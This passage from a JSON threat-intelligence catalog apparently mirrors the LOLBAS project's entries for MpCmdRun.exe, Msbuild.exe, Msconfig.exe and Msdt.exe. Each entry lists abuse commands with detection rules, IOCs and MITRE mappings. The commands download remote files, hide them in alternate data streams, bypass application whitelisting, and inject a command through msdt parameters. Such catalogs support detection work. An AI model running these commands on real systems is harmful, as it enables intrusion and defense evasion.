Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"]},{"id":"lolbas:mpcmdrun-exe:1","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"copy \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe\" C:\\Users\\Public\\Downloads\\MP.exe && chdir \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\\" && \"C:\\Users\\Public\\Downloads\\MP.exe\" -DownloadFile -url {REMOTEURL:.exe} -path C:\\Users\\Public\\Downloads\\evil.exe","description":"Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"]},{"id":"lolbas:mpcmdrun-exe:2","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe","description":"Download file to machine and store it in Alternate Data Stream","usecase":"Hide downloaded data into an Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"]},{"id":"lolbas:msbuild-exe:0","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msbuild.exe {PATH:.xml}","description":"Build and execute a C# project stored in the target XML file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:1","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.csproj}","description":"Build and execute a C# project stored in the target csproj file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:2","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo","description":"Executes generated Logger DLL file with TargetLogger export.","usecase":"Execute DLL","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:3","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.proj}","description":"Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.","usecase":"Execute project file that contains XslTransformation tag parameters","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msbuild-exe:4","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe @{PATH:.rsp}","description":"By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"]},{"id":"lolbas:msconfig-exe:0","toolId":"lolbas:msconfig-exe","toolName":"Msconfig.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Msconfig.exe -5","description":"Executes command embeded in crafted c:\\windows\\system32\\mscfgtlc.xml.","usecase":"Code execution using Msconfig.exe","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\msconfig.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml"},{"type":"IOC","value":"mscfgtlc.xml changes in system32 folder"}],"references":["https://twitter.com/pabraeken/status/991314564896690177","https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"]},{"id":"lolbas:msdt-exe:0","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"]},{"id":"lolbas:msdt-exe:1","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code bypass Application whitelisting","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"]},{"id":"lolbas:msdt-exe:2","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe /id PCWDiagnostic /skip force /param \"IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe\"","description":"Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the \"PCWDiagnostic\" module 